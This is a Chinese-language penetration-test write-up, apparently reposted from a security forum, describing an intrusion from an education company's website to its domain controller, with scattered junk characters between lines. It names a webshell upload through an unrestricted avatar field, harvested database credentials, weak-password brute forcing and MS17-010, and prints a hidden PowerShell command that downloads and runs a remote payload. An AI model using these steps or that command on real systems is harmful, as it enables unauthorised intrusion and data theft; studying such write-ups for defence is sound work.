$ }( F, I1 N% n9 [ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
! d- q% |0 z; z" |, n. J7 A+ j ! w P+ s: d+ [, j6 D
& W( v2 e$ W% I# o, P+ ?3 Q
; C6 O' O D) ~. g9 s 1 _2 W( E7 U% i
9 E3 c1 ]( Q/ a1 v7 u
正文
; A" l& Q0 M$ [) i, [
Y0 r& v3 t) n* I4 j: \# Y
' U, h' F0 u' r* }/ o2 r
8 c: O! R9 D2 Z2 D
" Y& T& h1 O& m/ y5 M4 c$ |, o# z$ C0 h
目标:www.xxxx.com(一家教育机构) " G2 V B% W! R% U2 q
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能4 ?0 }7 ~) b$ z9 s
1 V8 h0 j2 `3 H* }& |9 L0 f2 B) b) r! Y( F: M2 Y+ Y/ \# V
3 k* {8 m3 y" H4 @$ l' v , y9 c/ n1 z' k4 l2 Y
* ~2 s) C2 S* d4 }" D0 `, @1 ?
进行了简单的信息搜集
) o2 ^4 U) m- E6 g) q5 i9 F
, D0 @1 ^, |% I. S+ M8 e; A* N' o- z \) I4 u3 s
4 e; p1 {) [6 |
2 A: c% x/ z% _# K 子域名搜集2 c$ o& f2 c% q
' ^! T% Z9 W6 B1 X$ i; f
# ^. W& ?! _, T8 @1 U 7 C' w* e9 V% n! I
6 R# Q8 u$ k% c4 d; K3 W2 d B7 c1 O8 |4 d( Q I
fofa找资产
* A. g2 r4 \3 H
|5 m- b5 V! a* a! d, }/ ~1 v4 u+ V: G! F# o* K. o$ u \
8 N3 S B! Q" J) ]) m0 c- v$ I
/ d( o" a+ h2 n4 h ^0 @
5 F* B C' ]% d% @9 |( e8 {
7 @% E' X5 T: o6 S8 R2 X( w$ e
* n8 [$ I% R2 ~ 一共七个资产。去重之后只有两个。 ; ?" y x( a+ v* V. d
3 ~$ x. M# ?" g! ?: f
7 g5 x, n( X; T. p8 X: w1 S ( I) V& Y3 y- [1 n) W* C5 K) C2 ?. b
" M# p- Z) W7 Y9 L2 Y8 \, c
目录探测
+ G4 y( u) g) Z, o, @! q7 e2 q+ ] 6 r7 k: ]+ a4 P+ J3 l: @
8 Z$ q) C* F. l j# s: d0 y) e4 j9 i. Q2 _ . L& o* o7 j! {! q/ k( {0 n; x" U1 a
9 _: p% _1 z ]7 V/ A
; i) d d% O' `5 W% l; \ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 ) q" j) Y8 q$ ]+ k
2 l& p ~. F& Q; L
9 L9 D- H' b6 Y7 e% a# F
$ ^9 _( s1 S. |3 q1 r' w9 c: x
/ V/ U9 X6 h0 p3 M- ]) ~ 我又尝试了通过修改返回包来绕过登录界面
( }+ E) y S. k% B5 t
" g$ g$ b) E/ K6 K6 ~5 ~; C
8 c) ~# h* B" W9 k / E# E4 T0 Z( B l4 A* Y
! O- J5 ?$ Z' G. |
3 O' j6 X# ^& `+ H2 j3 v& ]( G8 j 还是不行,尝试注入无果
; V' W) z! {+ N1 a6 y / c- O# p) {! k6 b8 W$ u* G9 T! o/ u1 Z7 c
, |$ o- p9 ?9 |8 f( a, j
4 F9 \+ U0 f; u0 L, z5 B" O. s; { % y" X. a& P: y! x0 T
! l4 W* A& `8 S B- @7 O
不过我目录探测出了一处Spring信息泄露
8 y3 M# ]/ j9 c# X/ H" r6 I1 g , m- P/ v0 I; I0 E* [* I9 W1 M
7 v8 A5 b d. w+ U+ t0 c
9 N6 l) X* W+ G
! r7 O X! k! h" G1 H: O- g; W. W
9 ]5 v1 q2 |6 s; p. o % F% ` m! ?& W& E. N
( ~ o# Y4 Z, M: l. Q* O' e& A9 {! V
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录8 e% w, c( H8 v) |
0 A" h6 J2 X( G% S4 d2 R. G$ j) Y' e0 W9 E
* f8 Q& P% K9 H& l U ( t" t: t6 a7 q$ n, m% G% L0 M
: R5 W& w- `' K5 y4 d
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 e% A$ U4 F* I& b7 p/ M8 F; }; r
- [: @5 z E5 g
7 X$ g& J( J6 W" n3 c+ j* [
: o0 f- j) I- ]/ y7 Y( v, ^
, I( L( y3 _3 y$ G# W# d
R! L2 ?' b; C 获取有些师傅到这一步就手机抓包电脑测了。
$ n% s2 o# f8 R' d7 E- x D9 M
" w% D' N7 F4 E6 ?4 X: _6 \# ?! w9 C2 o/ Y5 Z
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。7 ?8 X5 k% \$ ^
4 P$ C+ o1 T% C: g
! Y7 J4 ^' p' A6 a# ]0 D& `* T7 X 其中在一个公众号发现了小程序,可以进行注册。
9 S5 \# \/ k$ N) u$ I 9 v4 `# c' ]3 C
! B' \" f! N) M B+ I: S* u0 \9 p
看到了头像上传,尝试上传获取WebShell: A" h" |" V5 s3 d. O+ Q" K, V
- s8 v- Z" _& f8 L
. H" p* x( N: l/ N2 _' R+ K- q
0 _3 Y8 I! F3 N% Z, l2 K* j
; z2 @6 X6 ] |" Z; c- F* \8 N( C0 F
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问" q S0 Z7 E3 ~3 V
; t% Z7 p- \ Q) ~
9 A4 p! |0 P# F9 U/ H0 A$ [
; c4 ?# Q; I- H, r5 m( }/ x . X8 {6 X8 R5 A1 {3 r% ^+ M
* e. G2 C* V+ S4 k2 N
然后上了大马) b' s! Z1 a/ g
" w: c, W! y) L: t" C7 g) `* i0 j; t ~4 F8 k( X5 x Q3 h
2 P( s9 z$ \! t& z3 T! Q
9 X$ E6 G& {6 n( y( d
8 k3 L, U# X }7 l! P. M# }) b M( Y0 ~9 K0 x) j% g
3 r% ^. F' c& e& P, v
* \/ V5 j8 R1 ~) X `( p7 | 通过翻找文件发现数据库账号密码4 K: B- H, T2 j0 O2 E
. m& V8 L* T4 }/ N
! b" q% Y8 r5 O; H1 p5 ?
2 L1 o: d1 N% @# D: a2 U ^' p$ c5 c; z
, t% N; ~, H0 W' h( ]" B0 F" }7 E1 B9 v7 ]" f& d
--内网渗透+ d* g* o; Q- e e$ O
( Q; q0 T a B0 C' g( A
x' J) P, R0 [2 w 直接通过powershell执行 cs上线
9 g, G1 F9 Z: t& Y
0 h3 I0 ^9 w5 d+ H' m- g* }! W' I D% `; Q8 G7 p
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"6 u; Q& n4 z1 C4 n7 P
3 w& _. y7 X# x" f
4 e: @; t$ x0 t8 ?! m; `
6 X% C. L! w1 A- H; h- P* R: i1 U( U
! n' L! i8 e+ D, E+ c+ P3 J' t5 j3 Z4 W5 p6 U/ m3 R
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破2 \8 @0 ?) O- e
& l ^5 k# |8 J6 s, e r( q) R( M
9 ]4 L0 K" W+ G' O" | 9 Z# d; i5 Q8 T2 `) U1 S3 S
: y% |7 U1 [# K8 x: r' i; [: T
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
' |* v, z6 U3 [1 X/ G + U2 |1 Q3 l2 I# o9 |, V
' E% A8 |. Z/ i1 T
7 _$ k3 [1 Q) O9 w/ _( W3 L1 W5 ~
$ r$ ^& ]% B) U3 B, \% j9 r: [
( T4 A/ B5 R: _4 k) j& E" t + w% z" K. \+ _7 W7 J! k
0 {: N3 }# P( E* F" [6 l' S1 N8 g; k7 E8 s. b9 T7 U |
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ o4 e7 Y9 S+ E. s: S # t" \; _! z5 N+ l
8 H5 P F% o& z) l ! i6 q/ @1 K& d
9 z( g' S5 F2 O5 R
7 o, {0 \! m6 b4 E+ S. \. O
4 W3 F* t9 W; h! T& Q; h: N k6 q( P9 s- S, D
* |" l, N% p9 G1 w/ ^
: K; |9 k# b, s7 E& v# e) D8 P" Q0 ^+ ^
: j# A2 R; T- ]; F: |$ s( R- S
* Y! O7 f2 B' G+ N1 Z
' k5 P. q6 S9 \. d4 U1 y 5 a& O. |7 t. m) o: T: ?
t% ?/ G* _2 Q7 j1 b 小结
, l7 _" m( b) M , m3 R6 Q( U2 ]8 V: X2 M
+ G8 D @# J$ S
/ B& {* A( T; ]$ t" b1 X* H & i0 l$ Z4 O. e2 `8 m& C, t
5 k" _! Q3 y i, D' B 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
2 s9 ]9 k9 ^" w% b
% k1 J9 Y( [" \' S- t
1 D, ~' z# i( M& n
6 P! {. A" e* x1 |, a8 B , ~, ^# o5 M9 {- k( M& {+ y6 L2 @" F
& A( g) R$ D9 ?6 [ - 5 i* x7 a( s& |+ X& c' z3 R; H7 S% k
3 V- i7 C! ^7 Q
6 f- l8 C- `/ V; [ -
; h/ T" S8 r' e$ N# W [4 P
7 t; r7 ?5 ]7 ^7 ?% @
: D" P# J1 m' H4 S$ o0 v
|( ~9 R0 L* w. t4 ~5 `, P
. e0 t3 q: R% r& c" `
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
9 y" E, g0 X* p% r
& }2 {) {5 W: q0 h3 C9 ?; J
6 @8 R" d* Z/ l7 T 2 p) p2 v( x- ~1 X+ M
|